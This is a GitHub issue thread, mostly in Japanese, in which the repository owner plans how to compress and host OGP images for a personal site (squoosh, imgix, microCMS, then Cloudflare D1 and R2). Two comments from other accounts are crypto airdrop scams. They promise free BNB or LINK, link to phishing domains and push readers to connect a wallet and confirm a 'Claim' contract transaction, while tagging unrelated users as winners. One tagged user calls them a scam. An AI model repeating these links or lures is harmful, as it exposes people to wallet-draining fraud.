### ISSUE TITLE
画像の圧縮 / サイズを落とす

### ISSUE THREAD

**Issue by konojunya** [konojunya/0xjj.dev#35]
現在 #34 にて main job / side job の ogp 画像をローカルで持っているが、そのまま持ってきてるので png / jpg の圧縮をかけたい

https://squoosh.app/

にて圧縮を行う

**Comment by konojunya** [comment]
#36 で imgix にするなら元画質のままGCSにアップロードしてしまって最適化はimgixでやれば良いかなと言う気持ちでもいる

が、microCMSに移行しないといけないほど転職するのか？みたいな疑問があるので今の構成のままでいく線で考えると squoosh をかけるで安牌かなぁ

**Comment by konojunya** [comment]
転職しなくても社内で事業の実例が増えることが多々あることに気がついたのでフォーマット化してmicroCMS導入再検討

**Comment by konojunya** [comment]
microCMSでやろうと思ってたけど、full cloudflare で遊んでみたいので D1 で管理する

**Comment by konojunya** [comment]
画像の hosting は rclone 的なものの前段に sqoosh いれて小さくしてから R2 に upload みたいな cli 作っておこうかな

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by ikubij** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @jadewaver, @mcgravier, @herculan0, @boozook, @s7evinz, @qbig, @mouse484

**Comment by boozook** [comment]
I'm not sure but suppose that it's just scam. 
I have nothing to do with this project, no any relations. So I have no idea why I mentioned here.

**Comment by konojunya** [comment]
画像がほぼなくなったので。
